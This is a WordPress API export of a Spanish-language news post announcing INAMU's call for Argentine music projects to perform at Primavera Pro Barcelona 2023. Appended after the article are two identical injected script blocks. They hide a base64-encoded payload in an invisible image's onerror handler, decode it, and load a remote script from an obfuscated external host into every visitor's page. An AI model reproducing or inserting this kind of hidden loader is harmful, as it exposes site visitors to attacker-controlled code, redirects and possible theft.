{"id":2455,"date":"2023-04-04T11:57:08","date_gmt":"2023-04-04T14:57:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2455"},"modified":"2025-08-14T00:19:46","modified_gmt":"2025-08-14T03:19:46","slug":"abre-la-inscripcion-al-segundo-llamado-de-la-convocatoria-de-fomento-internacional-2023-del-inamu","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2455","title":{"rendered":"Abre la inscripci\u00f3n al segundo llamado de la Convocatoria de Fomento Internacional 2023 del INAMU"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Hasta el 10 de abril, proyectos musicales de todo el pa\u00eds podr\u00e1n presentarse para participar en los showcases de \u201cPrimavera Pro, Barcelona\u201d en Espa\u00f1a.<\/em><\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"359\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-1024x359.jpeg\" alt=\"\" class=\"wp-image-2456\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-1024x359.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-300x105.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-768x269.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-696x244.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-1068x375.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_-1198x420.jpeg 1198w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_4-4-2023_115523_www.argentina.gob_.ar_.jpeg 1497w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>El&nbsp;<a href=\"https:\/\/inamu.musica.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Instituto Nacional de la M\u00fasica<\/a>, dependiente del&nbsp;<strong>Ministerio de Cultura<\/strong>, lanza su Fomento Internacional \u201cINAMU MusicArgentina\u201d. En este segundo llamado del a\u00f1o, realizado junto al&nbsp;<a href=\"https:\/\/www.cancilleria.gob.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Ministerio de Relaciones Exteriores, Comercio Internacional y Culto de la Rep\u00fablica Argentina<\/a>&nbsp;y la Direcci\u00f3n Nacional de Turismo, Deportes, Industrias Culturales y Servicios Basados en el Conocimiento (DNTEC), se abre la convocatoria para participar con proyectos musicales en los showcases de \u201cPrimavera Pro, Barcelona\u201d, a realizarse del 31 de mayo al 4 de junio de 2023 Barcelona, Espa\u00f1a.<\/p>\n\n\n\n<p>Esta convocatoria se realiza con el apoyo de\u00a0<a href=\"https:\/\/www.sadaic.org.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">SADAIC<\/a>\u00a0(Sociedad Argentina de Autores y Compositores de M\u00fasica). La delegaci\u00f3n musical\u00a0<strong>INAMU MusicArgentina<\/strong>\u00a0en\u00a0<strong>Primavera Pro Barcelona<\/strong>\u00a0cuenta con el acompa\u00f1amiento de\u00a0<a href=\"https:\/\/indiehoy.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">IndieHoy<\/a>.<\/p>\n\n\n\n<p>La convocatoria est\u00e1 dirigida a proyectos de todos los estilos musicales, formato solista o banda. Ser\u00e1n seleccionados dos proyectos musicales.<\/p>\n\n\n\n<p><strong>Importante<\/strong>: El&nbsp;<a href=\"https:\/\/inamu.musica.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">INAMU<\/a>&nbsp;no forma parte del proceso de selecci\u00f3n de los proyectos. El mismo se encuentra a cargo de la Direcci\u00f3n Art\u00edstica de Primavera Pro, no teniendo el&nbsp;<a href=\"https:\/\/inamu.musica.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">INAMU<\/a>&nbsp;ninguna participaci\u00f3n en dicha instancia.<\/p>\n\n\n\n<p>La inscripci\u00f3n estar\u00e1 abierta entre el\u00a0<strong>3 de abril desde las 18 h y el 10 de abril hasta las 18 h<\/strong>. Las\u00a0<strong>bases, condiciones e inscripci\u00f3n<\/strong>\u00a0se encuentran disponibles en el enlace\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/1NEcmT2iMkf_eO1NOpdQ8Dma0J7ls6ajh4rHLPWMAnWA\/closedform\" target=\"_blank\" rel=\"noreferrer noopener\">Primavera Pro, Barcelona<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/16350595330_f928cf905c_c.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Sobre el Fomento Internacional del INAMU<\/h4>\n\n\n\n<p>La l\u00ednea de Fomento Internacional del&nbsp;<a href=\"https:\/\/inamu.musica.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">INAMU<\/a>&nbsp;constituye una acci\u00f3n in\u00e9dita para el sector musical independiente de la Argentina promoviendo la presencia en Ferias y Mercados internacionales, la vinculaci\u00f3n con distintos agentes del sector y la formaci\u00f3n en materia de internacionalizaci\u00f3n.<\/p>\n\n\n\n<p>Desde el a\u00f1o 2018, m\u00e1s de 20 delegaciones de bandas y solistas viajaron a ferias y mercados de Latinoam\u00e9rica y Europa, participando de rondas de negocios, showcases, conferencias y capacitaciones. A esto se sumaron en modalidad virtual y presencial un total de 80 proyectos musicales de 20 provincias, alcanzando a m\u00e1s de 500 m\u00fasicos que participaron durante el 2020 y 2021 de 10 ferias internacionales y capacitaciones espec\u00edficas. En 2022 se abrieron convocatorias para participar en showcases de 6 Ferias Internacionales, beneficiando a m\u00e1s de 11 proyectos.<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n en la web de&nbsp;<a href=\"https:\/\/inamu.musica.ar\/fomentointernacional\" target=\"_blank\" rel=\"noreferrer noopener\">INAMU<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 10 de abril, proyectos musicales de todo el pa\u00eds podr\u00e1n presentarse para participar en los showcases de \u201cPrimavera Pro, Barcelona\u201d en Espa\u00f1a. El&nbsp;Instituto Nacional de la M\u00fasica, dependiente del&nbsp;Ministerio de Cultura, lanza su Fomento Internacional \u201cINAMU MusicArgentina\u201d. En este segundo llamado del a\u00f1o, realizado junto al&nbsp;Ministerio de Relaciones Exteriores, Comercio Internacional y Culto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2457,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11,21],"tags":[],"class_list":{"0":"post-2455","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles","9":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2455"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2455"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2455\/revisions"}],"predecessor-version":[{"id":7125,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2455\/revisions\/7125"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2457"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2455"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2455"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2455"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}